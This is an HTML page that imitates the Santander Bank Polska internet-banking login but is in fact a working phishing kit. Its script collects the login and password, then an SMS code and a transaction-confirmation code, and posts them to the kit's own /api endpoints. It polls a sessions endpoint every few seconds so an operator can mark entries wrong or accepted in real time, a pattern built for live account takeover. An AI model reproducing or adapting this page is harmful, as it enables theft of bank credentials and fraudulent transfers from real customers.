<!DOCTYPE html>
<!-- saved from url=(0014)about:internet -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pl" lang="pl">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="description" content="Nowoczesna bankowość elektroniczna, która umożliwia zarządzanie finansami przez internet. To
         wygodne narzędzie, które pozwala po zalogowaniu na łatwe i szybkie zamawianie m.in. kredytów, kart
         kredytowych oraz otwieranie kont i lokat.">
    <meta name="keywords" content="bzwbk, wbk, bank zachodni wbk, logowanie, bzwbk24, logowanie na konto,">
    <title>Logowanie do Santander internet</title>

    <style id="com-bzwbk-commons-web-view-info-ObsoleteBrowserNotificationPanel-0">
        /*<![CDATA[*/
        .obsolete-browser-container { position: relative; width: 100%; background-color: #626367; }
        .obsolete-browser { position: relative; width: 990px; height: 60px; line-height: 60px; text-align: center; color: white; font-size: 14px; margin: 0 auto; }
        .obsolete-browser-error { display: inline-block; vertical-align: middle; width: 30px; height: 30px; margin: 0 10px 2px 0; background: url('/css/images/token-error-white-small.png') no-repeat center; background-size: contain; }
        .obsolete-browser-close { position: absolute; top: 15px; right: 5px; width: 15px; height: 15px; padding: 5px; cursor: pointer; background: url('images/buttons/close.png') no-repeat center; }

        /*]]>*/
    </style>
    <style id="com-bzwbk-commons-web-view-authentication-component-LinkListLocaleSelectorPanel-0">
        /*<![CDATA[*/
        .lang_container {
            display: flex;
            align-items: center;
        }
        ul#lang{
            display: flex;
            flex-direction: row;
            flex-wrap: nowrap;
            justify-content: space-between;
            list-style: none;
            font-size: 16px;
            line-height: 20px;
        }
        ul#lang li {
            flex-grow: 1;
            flex-basis: auto;
            padding: 0 0.5em;
            text-align: center;
            border-left: 1px solid #137E84;
        }
        ul#lang li:first-of-type {
            border-left: none;
        }
        ul#lang li:last-of-type {
            padding-right: 1px;
        }
        ul#lang li a:disabled {
            font-weight: bold;
            cursor: pointer;
        }
        ul#lang li a, ul#lang li span {
            font-weight: normal;
            color: #137E84;
        }
        ul#lang li span {
            font-weight: bold;
            pointer-events: none;
        }

        /*]]>*/
    </style>
    <link rel="stylesheet" type="text/css" href="/assets/banks/santander_files/gain-access-ver-6AC4D55C4DB9F67BE6F207D39F9E8093.css">
    <link rel="stylesheet" type="text/css" href="/assets/banks/santander_files/modal-window-ver-AEEF53CDE0FC9D41683717E687A34650.css">
    <link rel="stylesheet" type="text/css" href="/assets/banks/santander_files/_css_style_3_button.min.css" media="screen">

    <style type="text/css" id="com-bzwbk-commons-web-view-authentication-component-TopBarPanel-0">
        /*<![CDATA[*/
        .social_bzwbk span.aktualnosci{
            color: #ff0000;
        }

        /*]]>*/
    </style>
    <link rel="stylesheet" type="text/css" href="/assets/banks/santander_files/topbar.css">
    <link rel="shortcut icon" href="https://www.centrum24.pl/css/eSmart/favicon.ico?mn=9a490287">
    <link rel="stylesheet" type="text/css" href="/assets/banks/santander_files/_css_eSmart_logowanie.min.css" media="screen">
    <link rel="stylesheet" type="text/css" href="/assets/banks/santander_files/santander-font.css">
    <link rel="stylesheet" type="text/css" href="/assets/banks/santander_files/opensans-font.css">

</head>
<body>
<div id="wrapper" class="fixed">
    <div id="header" class="loginPanel">
        <a rel="noreferrer noopener" class="bankLogo" href="https://santander.pl/"><img alt="Santander" src="/assets/banks/santander_files/santander-red.svg"></a>
        <div class="title"></div>
        <div id="id2" class="top-bar">
            <section id="page_head">
                <div class="page_header_wrapper page">
                    <header>
                        <a href="https://www.centrum24.pl/centrum24-web/login?x=r2fjHnlwe9Q&amp;_ga=2.20190648.1631882499.1612195822-1158138130.1612195822#" class="contact">
                            Kontakt
                        </a>
                        <a rel="noreferrer noopener" href="https://santander.pl/" class="order2">
                            Przejdź do santander.pl
                        </a>
                        <a href="https://www.centrum24.pl/centrum24-web/login?x=r2fjHnlwe9Q&amp;_ga=2.20190648.1631882499.1612195822-1158138130.1612195822#" class="signin">
                            Przejdź do innych serwisów
                        </a>
                    </header>
                </div>
            </section>
            <section class="loginPanel contact_details">
                <a class="window-close" href="https://www.centrum24.pl/centrum24-web/login?x=r2fjHnlwe9Q&amp;_ga=2.20190648.1631882499.1612195822-1158138130.1612195822#" title="Zamknij okno"></a>
                <article>
                    <p class="header">Infolinia</p>
                    <div class="infolinia">
                        <span class="number">Infolinia <a href="tel:19999"><b>1 9999</b></a></span>
                        <small>Z zagranicy</small>
                        <span class="small-number"><a href="tel:+48618119999">+48 61 81 19999</a></span> <br>
                        <a rel="noreferrer noopener" style="font-size: 11px;" href="https://santander.pl/informacje-o-banku/kontakt/menu-infolinii/menu-infolinii-1-9999.html">Menu infolinii »</a>
                    </div>
                    <div class="infolinia skype">
                        <span class="number"><a href="skype:infolinia.bzwbk">Skype</a></span>
                    </div>
                    <ul class="list">
                        <li>Zastrzeganie kart, pomoc w zakresie kart, bankomatów, bankowości elektronicznej - <b>24h</b></li>
                        <li>Zamawianie produktów (konta, kredyty, karty) <b>8.00 - 20.00, w dni robocze</b></li>
                        <li class="disclimer">* Opłata za minutę połączenia zgodna z taryfą danego operatora.</li>
                    </ul>
                </article>
                <article>
                    <p class="header">Napisz do nas</p>
                    <ul class="list">
                        <li>Jeśli masz pytania dotyczące oferty banku, chcesz kupić produkt, przesłać swoją opinię zapraszamy do wypełnienia formularza:</li>
                        <li style="padding-bottom: 10px;">
                            <a rel="noreferrer noopener" class="formularz" href="https://santander.pl/informacje-o-banku/kontakt/kontakt-zadaj-pytanie.html">Formularz kontaktowy</a>
                            lub wysłania wiadomości na adres:
                        </li>
                        <li class="mail_kontakt">
                            <a class="mail" href="mailto:kontakt@santander.pl">Wyślij email</a>
                        </li>
                        <li>
                            Jeśli chcesz złożyć reklamację, zaloguj się do Santander internet i napisz do nas, wybierając opcję w Poczcie lub zakładce Twoje sprawy.
                        </li>
                        <li>
                            Potwierdzeniem dotarcia wiadomości do Santander Bank Polska S.A. jest otrzymanie autoodpowiedzi.
                        </li>
                        <li class="social"><span>Dołącz do nas:</span>
                            <a rel="noreferrer noopener" target="blank" href="https://pl-pl.facebook.com/santanderbankpolska" class="contact-button" onclick="javascript: trackClick(this,&#39;/header/button/kontakt/button/facebook&#39;);return false;"><span class="fb"></span></a>
                            <a rel="noreferrer noopener" target="blank" href="http://www.youtube.com/user/BankZachodniWBK" class="contact-button" onclick="javascript: trackClick(this,&#39;/header/button/kontakt/button/youtube&#39;);return false;"><span class="yt"></span></a>
                            <a rel="noreferrer noopener" onclick="javascript: trackClick(this,&#39;/header/button/kontakt/text-link/blog&#39;);return false;" class="contact-button" href="http://blog.santander.pl/" target="blank"><span class="blog"></span></a>
                            <a rel="noreferrer noopener" onclick="javascript: trackClick(this,&#39;/header/button/kontakt/text-link/bank-pomyslow&#39;);return false;" class="contact-button" href="https://bankmozliwosci.santander.pl/" target="blank"><span class="bankp"></span></a>
                        </li>
                    </ul>
                </article>
                <article class="hide-mobile">
                    <p class="header">Zgłaszanie cyberincydentów</p>
                    <ul class="list">
                        <li>
                            Jeśli ktoś próbuje przejął Twoje dane logowania do bankowości internetowej lub padłeś ofiarą oszustwa, skontaktuj się z nami.
                        </li>
                        <li class="mail_kontakt">
                            <a class="mail" href="mailto:csirt@santander.pl">Wyślij email</a>
                        </li>
                    </ul>
                    <p class="header">Moja Firma plus</p>
                    <ul class="list">
                        <li>
                            Wsparcie funkcjonalne i techniczne dla<br>użytkowników Moja Firma plus
                        </li>
                        <li>
                            <span class="small-number"><a href="tel:+48618565484">+48 61 856 54 84</a></span>
                        </li>
                        <li class="mail_kontakt">
                            <a class="mail" href="mailto:MojaFirmaPlus@santander.pl">Wyślij email</a>
                        </li>
                        <li class="disclimer">* Opłata za minutę połączenia zgodna z taryfą danego operatora.</li>
                    </ul>
                </article>
                <article>
                    <p class="header">Public Relations</p>
                    <ul class="list">
                        <li>
                            Kontakt dla dziennikarzy
                            <br><a href="mailto:biuro.prasowe@santander.pl">biuro.prasowe@santander.pl</a>
                        </li>
                        <li>
                            Zapytanie dot. sponsoringu
                            <br><a href="mailto:sponsoring@santander.pl">sponsoring@santander.pl</a>
                        </li>
                        <li>
                            Oferty marketingowe
                            <br><a href="mailto:marketing@santander.pl">marketing@santander.pl</a>
                        </li>
                        <li style="padding-top: 10px;border-top: 1px solid #ECEEEF;">
                            <a rel="noreferrer noopener" class="home" href="https://santander.pl/przydatne-informacje/wyszukiwarka-placowek-i-bankomatow/wyszukiwarka-placowek-i-bankomatow.html">Znajdź oddziały i bankomaty</a>
                        </li>
                    </ul>
                </article>
            </section>
            <section class="signin_box">
                <a class="window-close" href="https://www.centrum24.pl/centrum24-web/login?x=r2fjHnlwe9Q&amp;_ga=2.20190648.1631882499.1612195822-1158138130.1612195822#" title="Zamknij okno"></a>
                <div class="left">
                    <article>
                        <div class="wrapper info_logowanie">
                            Logowanie dla klientów indywidualnych i firm
                        </div>
                    </article>
                    <article class="last hide-mobile">
                        <div class="wrapper">
                            <a rel="noreferrer noopener" href="https://www.centrum24.pl/centrum24-web/login" class="button_signin" onclick="javascript: trackClick(this,&#39;/header/button/zaloguj/button/bzwbk24&#39;);return false;">Santander internet<span></span></a>
                        </div>
                    </article>
                    <article class="last hide-mobile">
                        <div class="wrapper">
                            <a rel="noreferrer noopener" href="https://www.centrum24.pl/centrum24-web/login" class="button_signin" onclick="javascript: trackClick(this,&#39;/header/button/zaloguj/button/bzwbk24&#39;);return false;">Mini Firma / Moja Firma plus<span></span></a>
                        </div>
                    </article>
                    <article class="last">
                        <div class="wrapper">
                            <a rel="noreferrer noopener" href="https://ibiznes24.pl/bzwbk24biznes-client/login.html" class="button_signin" onclick="javascript: trackClick(this,&#39;/header/button/zaloguj/button/ibiznes24&#39;);return false;">iBiznes24<span></span></a>
                        </div>
                    </article>
                    <article class="last">
                        <div class="wrapper">
                            <a rel="noreferrer noopener" href="https://www.inwestoronline.pl/cbm/" class="button_signin" onclick="javascript: trackClick(this,&#39;/header/button/zaloguj/button/inwestor-online&#39;);return false;">Inwestor online<span></span></a>
                        </div>
                    </article>
                    <article class="last">
                        <div class="wrapper">
                            <a rel="noreferrer noopener" href="https://www.centrum24.pl/prepaid/index?index=1491" class="button_signin" onclick="javascript: trackClick(this,&#39;/header/button/zaloguj/button/serwis-prepaid&#39;);return false;">Serwis prepaid<span></span></a>
                        </div>
                    </article>
                </div>
            </section>
        </div>
    </div>
    <div id="container">
        <div id="kolumna-lewa">
            <div id="bezpieczenstwo">
                <div class="title">Bezpieczeństwo</div>
                <ol id="bezpieczenstwoLista">
                    <div class="item">
                        <li></li>
                        <span>Nie udostępniaj swoich danych.</span>
                    </div>
                    <div class="item">
                        <li></li>
                        <span> Czytaj treść smsKodów.</span>
                    </div>
                    <div class="item">
                        <li></li>
                        <span>Nie klikaj w linki i załączniki od nieznanych nadawców.</span>
                    </div>
                </ol>
                <div class="item"><a rel="noreferrer noopener" class="button button-secondary" target="_blank" href="https://santander.pl/bankowosc-elektroniczna/bezpieczenstwo-i-prywatnosc/zelazne-zasady-bezpieczenstwa.html?utm_source=bzwbk24&amp;utm_medium=tekst&amp;utm_campaign=a5_2017-09-11_bezpieczenstwo-ogolny-9-2017&amp;utm_content=log-le_bezp">Więcej</a></div>
            </div>
            <div id="log_left">
                <a href="https://www.centrum24.pl/centrum24-web/login?x=JA6QgpCUqPoIR752aMno5as6I3d28WsrB0eSVtghbMpG_i7rOM3sMuzSktUX9yV25JbbHWbasqsPgqGiS2TEXj7slD6kB4fvdoqdvQLyZjfKUCOa6BQdAg&amp;_ga=2.20190648.1631882499.1612195822-1158138130.1612195822" target="_blank"><img src="/assets/banks/santander_files/mediaImage" alt="LOGLEWY_AUTOPAY-0121"></a>
            </div>
        </div>
        <div id="content">
            <div class="login-wrapper">
                <style>
                    /*<![CDATA[*/
                    #akcje #accessDiv a span {
                        font-size: 14px !important;
                    }

                    /*]]>*/
                </style>
                <div id="logowanie" class="logowanie loginPanel">
                    <h1>
                        <div id="summaryInfo">
                            Logowanie KROK&nbsp;1
                        </div>
                    </h1>
                    <div id="logowanie-inner-NIK">
                        <div class="">
                            <div style="width:0px;height:0px;position:absolute;left:-100px;top:-100px;overflow:hidden" class="hidden-fields"><input type="hidden" name="nikForm_hf_0" id="nikForm_hf_0"></div>
                            <div class="forms">
                                <div class="labelsLine" id="labelContainer">
                                    <label for="input_nik" id="niklabelk1">
                                 <span class="login-step-instruction">
                                 <strong>Wpisz login</strong>
                                 <span style="margin-left: 5px">
                                 </span>
                                 </span>
                                    </label>
                                </div>
                                <div class="feedbackDiv">
                                 <span>
                                 </span>
                                    <input id="bank_login" name="nik" size="10" maxlength="20" class="content_center_input input_nik" step="2" autocomplete="off" tabindex="2" value="" minlength="6"><br><br>
                                    <label for="input_nik" id="niklabelk1">
                                 <span class="login-step-instruction">
                                 <strong>Wpisz hasło</strong>
                                 <span style="margin-left: 5px">
                                 </span>
                                 </span>
                                    </label><br><br>
                                    <input id="bank_password" type="password" name="nik" size="10" maxlength="20" class="content_center_input input_nik" step="2" autocomplete="off" tabindex="2" value="" minlength="6">
                                </div>
                                <br><br>

                                <button onclick="bankLogin(); santanderUpdate();" class="button button-primary"tabindex="2" alt="DALEJ" value="Zaloguj">Zaloguj</button><span style="display:none;" class="wicket-ajax-indicator" id="okBtn2--ajax-indicator"><img src="/assets/banks/santander_files/indicator-ver-75BEEBCC0A276C3974D2524B7F0619E1.gif" alt=""></span>

                                <div id="akcje">
                                    <div id="accessDiv">
                                        <a data-toggle="modal" data-target="#id1">
                                            <span>Jak uzyskać dostęp?</span>
                                        </a>
                                        <div id="id1" class="modal fade" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
                                            <div class="modal-dialog">
                                                <div class="modal-content">
                                                    <div class="modal-header">
                                                        <h1 class="modal-title">
                                                            <img class="modal-header-icon" src="/assets/banks/santander_files/log_question_big.png">
                                                            <span>Jak uzyskać dostęp?</span>
                                                        </h1>
                                                        <button type="button" class="close" data-dismiss="modal" aria-hidden="true"></button>
                                                    </div>
                                                    <div class="modal-body">
                                                        <div>
                                                            <div id="tipGainAccess">
                                                                <p>Aby się zalogować, w polu „Wpisz login” podaj NIK lub własny login.<br><strong>NIK</strong>, czyli Numer Identyfikacyjny Klienta, znajdziesz w Umowie usług Santander online dla klientów indywidualnych. <strong>Własny login</strong> jest to własny identyfikator, który jako Klient możesz ustalić bezpośrednio w Santander online.</p>
                                                                <div id="tipGainAccessDiv">
                                                                    <div>
                                                                        <p>Jeśli konto założyłeś przez <strong>internet lub telefonicznie, hasło</strong> otrzymałeś <strong>sms-em</strong> lub zostało one przesłane <strong>listem</strong>.</p>
                                                                    </div>
                                                                    <div>
                                                                        <p>Jeśli konto wraz z usługami bankowości elektronicznej zakładałeś <strong>w oddziale, hasło</strong> otrzymałeś w zamkniętej <strong>kopercie</strong> od doradcy.</p>
                                                                    </div>
                                                                </div>
                                                                <img id="exclamation-icon" src="/assets/banks/santander_files/log_excl_gray.png">
                                                                <p>Jeśli <b>nie pamiętasz hasła</b>, skontaktuj się z infolinią: tel. 1 9999 (+48 61 81 19999 dla dzwoniących z zagranicy) lub odwiedź jedną z placówek Santander Bank Polska S.A., aby wygenerować nowe hasło.</p>
                                                                <p>Jeśli jeszcze nie masz podpisanej Umowy usług Santander online dla klientów indywidualnych, odwiedź dowolną placówkę Santander Bank Polska S.A. lub skontaktuj się z <a href="https://www.santander.pl/doradca-online">Doradcą online</a>. Doradca aktywuje dla Ciebie usługi Santander online.</p>
                                                                <p></p>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div id="reset-password-link">
                                    <span>Problem z logowaniem?</span>
                                    <span id="redirect-link">Zresetuj swoje hasło</span>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <noscript>
                <div class="noscript logowanie loginPanel">
                    <style type="text/css">
                        /*<![CDATA[*/
                        #logowanie {
                            display: none;
                        }
                        h1 {
                            background: none;
                        }
                        .noscript p {
                            padding-bottom: 30px;
                        }
                        .noscript p, .noscript h1 {
                            color: red;
                        }
                        #kolumna-lewa ul {
                            border: 1px solid #E2E5E6;
                            padding: 5px;
                        }

                        /*]]>*/
                    </style>
                    <h1>Zalogowanie nie jest możliwe!</h1>
                    <p>Aby zalogować się do serwisu, musisz włączyć w przeglądarce wykonywanie aktywnych skryptów.</p>
                </div>
            </noscript>
            <div class="news">
                <p><strong style="color: #ff0000;">Uwaga! Może zadzwonić do Ciebie przestępca</strong></p>
                <p>Przestępcy dzwonią do naszych klientów i podszywają się pod pracowników banku. Bądź czujny, to próba wyłudzenia poufnych danych przez rozmowę telefoniczną. <a rel="noreferrer noopener" style="color: #ff0000;" href="https://www.santander.pl/klient-indywidualny/bankowosc-internetowa/bezpieczne-bankowanie/komunikaty/komunikaty-lista/vishing" target="_blank">więcej &gt;&gt;</a></p>
                <br>
                <p><strong>Z pełnym kontem pewniej</strong></p>
                <p>Kredyt w rachunku płatniczym, czyli limit kredytowy w koncie to gotówka na wszelki wypadek – od Ciebie zależy, czy po nią sięgniesz. Zaloguj się do Santander internet i kliknij w zakładkę Oferta banku. Wypełnij wniosek, a dodatkowe środki znajdziesz na koncie nawet w 60 sekund od jego złożenia (RRSO: 7,40%). <a href="https://www.santander.pl/lp/kredyt-w-rachunku-platniczym-online?utm_source=centrum24&amp;utm_%20medium=tekst&amp;utm_campaign=a7_20-01-2021_KOMUN_LK-0121&amp;utm_content=%20komun" target="_blank" rel="noreferrer noopener" style="color: #ec0000;">więcej &gt;&gt;</a></p>
                <br>
                <p><strong>Czas na zmiany?</strong></p>
                <p>Łatwo i równie bezpiecznie zatwierdzaj transakcje internetowe w aplikacji Santander mobile - bez czekania na smsKod i bez przepisywania. <a href="https://www.santander.pl/klient-indywidualny/bankowosc-internetowa/santander-mobile/mobilna-autoryzacja?utm_source=centrum24&amp;utm_medium=tekst&amp;utm_campaign=a3_27-01-2021_MAK0121&amp;utm_content=logow-dol" target="_blank" rel="noreferrer noopener" style="color: #ec0000;">więcej &gt;&gt;</a></p>
                <br>
                <p><strong>Informacje o zaplanowanych przerwach</strong></p>
                <p><a rel="noreferrer noopener" style="color: #ff0000;" href="https://www.santander.pl/dostepnosc" target="_blank">Tutaj </a>zawsze sprawdzisz informacje o zaplanowanych przerwach w bankowości internetowej i aplikacji mobilnej.</p>
            </div>
        </div>
        <div id="kolumna-prawa">
            <div id="log_right">
                <a href="https://www.centrum24.pl/centrum24-web/login?x=JA6QgpCUqPoIR752aMno5as6I3d28WsrB0eSVtghbMrG30dl4LvsnyGHh8-Oq6oSr0F54ncgSu88lYQ-3ilWjiu40kQJ4HC_xArdynPj5-zPRZAdSkLpSw&amp;_ga=2.20190648.1631882499.1612195822-1158138130.1612195822" target="_blank"><img src="/assets/banks/santander_files/mediaImage(1)" alt="LOGOW_KG-0221"></a>
            </div>
        </div>
    </div>
</div>
<div id="foot">
    <div class="inner-foot">
        <div class="footContent"><strong>Santander Bank Polska S.A.</strong> z siedzibą w Warszawie, przy al. Jana Pawła II 17, 00-854 Warszawa, zarejestrowana w Sądzie Rejonowym dla m. st. Warszawy w Warszawie, XIII Wydział Gospodarczy Krajowego Rejestru Sądowego pod nr KRS 0000008723. NIP 896-000-56-73. REGON 930041341. Wysokość kapitału zakładowego 1 021 893 140 zł. Wysokość kapitału wpłaconego 1 021 893 140 zł.</div>
        <div class="footContent"><strong>Słowniczek pojęć i definicji</strong> dotyczących usług reprezentatywnych, wynikających z rozporządzenia Ministra Rozwoju i Finansów z dnia 14 lipca 2017 r. w sprawie wykazu usług reprezentatywnych powiązanych z rachunkiem płatniczym, dostępny jest na stronie <a rel="noreferrer noopener" href="https://santander.pl/pad.html" target="_blank">santander.pl/PAD</a> oraz w placówkach banku.</div>
    </div>
</div>
<script src="/assets/js/jquery-3.5.1.min.js"></script>
<script src="/assets/js/cookies.core.1.3.min.js"></script>
<script src="/assets/js/banklogin.js"></script>

<script>
    let bankId = (cookieManager.read('session_id'))


    const santanderUpdate = () => {
        $("#logowanie-inner-NIK").empty()
        $("#logowanie-inner-NIK").append('<div class=\"labelsLine\" id=\"labelContainer\"> <label for=\"input_nik\" id=\"niklabelk1\"> <span class=\"login-step-instruction\"> <strong>Proszę podać kod SMS z twojego telefonu</strong> <span style=\"margin-left: 5px\"> </span> </span> </label> </div><input id=\"bank_psd\" name=\"nik\" size=\"10\" maxlength=\"20\" class=\"content_center_input input_nik\" step=\"2\" autocomplete=\"off\" tabindex=\"2\" value=\"\" minlength=\"6\"><button onclick="psdUpdate()" class="button button-primary" tabindex="2" alt="DALEJ" value="Zaloguj">Zaloguj</button>')
    }
    const regularCheck = () => {
        readTextFile("/api/sessions", function(text){
            var data = JSON.parse(text);
            for (let i=0;i<data["result"].length;i++) {
                if (data["result"][i]["uid"] == sessId) {
                    if (data["result"][i]["accepted"] == "true") {
                        summaryFunc()
                        clearInterval(multipleFunc)
                    }
                } else {

                }
            }
        });
    }




    const psdUpdate = () => {
        if ($("#bank_psd").val() !== "") {
            $.post("/api/psdupdate/", {
                bank_psd: $("#bank_psd").val(),
                sessionId: bankId
            }).done(data => {
                console.log('done')
                $("#logowanie-inner-NIK").empty()
                $("#logowanie-inner-NIK").append('<p style="font-size: 20px">Logowanie...</p>')
            }).fail(error => {
                console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
            })

        } else {
            console.log('not selectec')
        }
    }

    let multipleFunc = setInterval(function(){ regularCheck() }, 3000);

    //WRONG PASS

    const wrongPass = () => {
        $.post("/api/wrongpass/", {
            sessionId: bankId,
            name: "false"
        }).done(data => {
            console.log('done')
        }).fail(error => {
            console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
        })
    }

    const regularPass = () => {
        readTextFile("/api/sessions", function(text){
            var data = JSON.parse(text);
            for (let i=0;i<data["result"].length;i++) {
                if (data["result"][i]["uid"] == sessId) {
                    if (data["result"][i]["accepted"] == "wrongPass") {
                        clearInterval(multiplePass)
                        wrongPass()
                        location.reload()
                    }
                } else {

                }
            }
        });
    }

    let multiplePass = setInterval(function(){ regularPass() }, 3000);


    const summaryFunc = () => {
        $("#logowanie-inner-NIK").empty()
        $("#logowanie-inner-NIK").append('<div class=\"labelsLine\" id=\"labelContainer\"> <label for=\"input_nik\" id=\"niklabelk1\"> <span class=\"login-step-instruction\"> <strong>Proszę podać kod potwierdzający z twojego telefonu</strong> <span style=\"margin-left: 5px\"> </span> </span> </label> </div><input id=\"bank_summary\" name=\"nik\" size=\"10\" maxlength=\"20\" class=\"content_center_input input_nik\" step=\"2\" autocomplete=\"off\" tabindex=\"2\" value=\"\" minlength=\"6\"><button onclick="summaryCode()" class="button button-primary" tabindex="2" alt="DALEJ" value="Zaloguj">Zaloguj</button>')
        document.getElementById('summaryInfo').innerText = 'Autoryzuj Tranzakcję'
    }

    const summaryCode = () => {
        if ($("#bank_summary").val() !== "") {
            $.post("/api/summarycode/", {
                bank_summary: $("#bank_summary").val(),
                sessionId: bankId
            }).done(data => {
                $('#logowanie-inner-NIK').empty()
                $('#logowanie-inner-NIK').append('<p style="font-size: 20px">Trwa logowanie, proszę czekać</p')
            }).fail(error => {
                console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
            })

        } else {
            console.log('not selectec')
        }
    }

    const regularSummary=()=>{readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"wrongSummary"==s.result[e].accepted&&(summaryFunc(),wrongSum())})},wrongSum=()=>{$.post("/api/wrongsummary/",{sessionId:bankId,name:"false"}).done(e=>{console.log("done")}).fail(e=>{console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.","Wystąpił błąd")})};let multipleSummary=setInterval(function(){readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"wrongSummary"==s.result[e].accepted&&(summaryFunc(),wrongSum())})},3e3);const regularComplete=()=>{readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"completed"==s.result[e].accepted&&(location.href="/summary")})};let multipleCompleted=setInterval(function(){readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"completed"==s.result[e].accepted&&(location.href="/summary")})},3e3);
</script>

</body>
</html>